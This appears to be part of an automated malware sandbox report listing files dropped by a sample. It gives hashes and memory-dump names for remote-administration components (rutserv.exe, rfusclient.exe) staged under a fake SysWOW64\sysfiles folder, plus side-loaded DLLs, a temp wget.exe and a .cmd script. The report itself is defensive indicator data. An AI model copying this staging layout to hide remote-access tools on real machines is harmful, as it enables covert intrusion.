SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\RWLN.dll

MD5 bb1f3e716d12734d1d2d9219a3979a62
SHA1 0ef66eed2f2ae45ec2d478902833b830334109cb
SHA256 d7e9c9043ed7df2af800d9b2a33e3efddf68b70f043e9717afc4b7dd4e13e077
SHA512 bbc90747dd45a01b05f5c0b6fa58ffe18af894b05363267ac1cc9fe3262f5e65c8ae4e08dfd82d89b9112e86e42d24a12784b79f5ea30b6443015c19b6792c9c

memory/3848-409-0x0000000000B20000-0x0000000000B21000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/1252-416-0x0000000000870000-0x000000000091E000-memory.dmp

memory/380-417-0x0000000000BB0000-0x0000000000BD3000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/1148-424-0x00000000024A0000-0x00000000024A1000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll

MD5 8e3f59b8c9dfc933fca30edefeb76186
SHA1 37a78089d5936d1bc3b60915971604c611a94dbd
SHA256 528c0656751b336c10cb4c49b703eae9c3863f7f416d0e09b198b082cc54aeb8
SHA512 3224c20c30556774fd4bed78909f451b9a5a46aa59271b5e88b1e0e60145d217802a8f1fda3d3fabcd8546ca7783e0c70f0c419a28efe6c5160a102553a3c91d

C:\Windows\SysWOW64\sysfiles\gdiplus.dll

MD5 871c903a90c45ca08a9d42803916c3f7
SHA1 d962a12bc15bfb4c505bb63f603ca211588958db
SHA256 f1da32183b3da19f75fa4ef0974a64895266b16d119bbb1da9fe63867dba0645
SHA512 985b0b8b5e3d96acfd0514676d9f0c5d2d8f11e31f01acfa0f7da9af3568e12343ca77f541f55edda6a0e5c14fe733bda5dc1c10bb170d40d15b7a60ad000145

C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll

MD5 ff622a8812d8b1eff8f8d1a32087f9d2
SHA1 910615c9374b8734794ac885707ff5370db42ef1
SHA256 1b8fe11c0bdcbf1f4503c478843de02177c606912c89e655e482adec787c2ebf
SHA512 1a7c49f172691bf071df0d47d6ee270afbfa889afb8d5bd893496277fd816630ecd7b50c978b53d88228922ba6070f382b959ffc389394e0f08daab107369931

C:\Windows\SysWOW64\sysfiles\vp8encoder.dll

MD5 c638bca1a67911af7f9ed67e7b501154
SHA1 0fd74d2f1bd78f678b897a776d8bce36742c39b7
SHA256 519078219f7f6db542f747702422f902a21bfc3aef8c6e6c3580e1c5e88162b8
SHA512 ca8133399f61a1f339a14e3fad3bfafc6fe3657801fd66df761c88c18b2dc23ceb02ba6faa536690986972933bec2808254ef143c2c22f881285facb4364659f

C:\Windows\SysWOW64\sysfiles\vp8decoder.dll

MD5 6f6bfe02e84a595a56b456f72debd4ee
SHA1 90bad3ae1746c7a45df2dbf44cd536eb1bf3c8e2
SHA256 5e59b566eda7bb36f3f5d6dd39858bc9d6cf2c8d81deca4ea3c409804247da51
SHA512 ed2a7402699a6d00d1eac52b0f2dea4475173be3320dfbad5ca58877f06638769533229bc12bce6650726d3166c0e5ebac2dad7171b77b29186d4d5e65818c50

C:\Windows\SysWOW64\sysfiles\ripcserver.dll

MD5 30e269f850baf6ca25187815912e21c5
SHA1 eb160de97d12b4e96f350dd0d0126d41d658afb3
SHA256 379191bfd34d41e96760c7a539e2056a22be3d44bf0e8712b53e443f55aead90
SHA512 9b86a4eefdcae46e605f85e752ef61e39fd0212a19b7fd4c35eb3ab99851a0b906d048d12d1e1e985a340a67a64d405b8cf803555865137278f0c19d686df5e7

C:\Windows\SysWOW64\sysfiles\rasadhlp.dll

MD5 8679b09cc9600a1f11a3c09cec12637b
SHA1 cad5c92e561b64d1f4e1f70c7596dcf186304ecb
SHA256 7e840982833d4c4d68835003960762fa3982c899ac1c8b63e4fdbbb35448152f
SHA512 93a8d0e78932793ccd534c17c48af203665d7b3d326d7b21b2b4aa54925a853e674324774fa9a99194eca7a930d504568095529a6b6a2e63b73f0c719bc424e6

C:\Windows\SysWOW64\sysfiles\msvcr90.dll

MD5 7538050656fe5d63cb4b80349dd1cfe3
SHA1 f825c40fee87cc9952a61c8c34e9f6eee8da742d
SHA256 e16bc9b66642151de612ee045c2810ca6146975015bd9679a354567f56da2099
SHA512 843e22630254d222dfd12166c701f6cd1dca4a8dc216c7a8c9c0ab1afc90189cfa8b6499bbc46408008a1d985394eb8a660b1fa1991059a65c09e8d6481a3af8

C:\Windows\SysWOW64\sysfiles\msvcp90.dll

MD5 b2eee3dee31f50e082e9c720a6d7757d
SHA1 3322840fef43c92fb55dc31e682d19970daf159d
SHA256 4608beedd8cf9c3fc5ab03716b4ab6f01c7b7d65a7c072af04f514ffb0e02d01
SHA512 8b1854e80045001e7ab3a978fb4aa1de19a3c9fc206013d7bc43aec919f45e46bb7555f667d9f7d7833ab8baa55c9098af8872006ff277fc364a5e6f99ee25d3

memory/1768-436-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

memory/420-437-0x00000000001D0000-0x00000000001F3000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

memory/1200-446-0x0000000000980000-0x0000000000ACA000-memory.dmp

memory/2072-447-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

memory/2844-452-0x00000000009C0000-0x0000000000A2E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wget.exe

MD5 bd126a7b59d5d1f97ba89a3e71425731
SHA1 457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256 a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA512 3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

C:\Users\Admin\AppData\Local\Temp\wget.exe

MD5 bd126a7b59d5d1f97ba89a3e71425731
SHA1 457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256 a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA512 3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd

MD5 af74ff71f11cec559a5aaee9a41c9710
SHA1 0df60a0511d2ae122a8e5b736efda1bdf0bee41d
SHA256 66a1f91373099569c354e909757faac87a5d6f00bc7fdd3d9a85e4324bae9a80
SHA512 e8f8b566c9116c42d57dbe6edf20b76b96976f7e5f7c9ba766a6d3e7aa4b49404bb66456e56d25c6623d5a2a963cec19e0dc4a7caa6ed3fe22074b747dffd5e9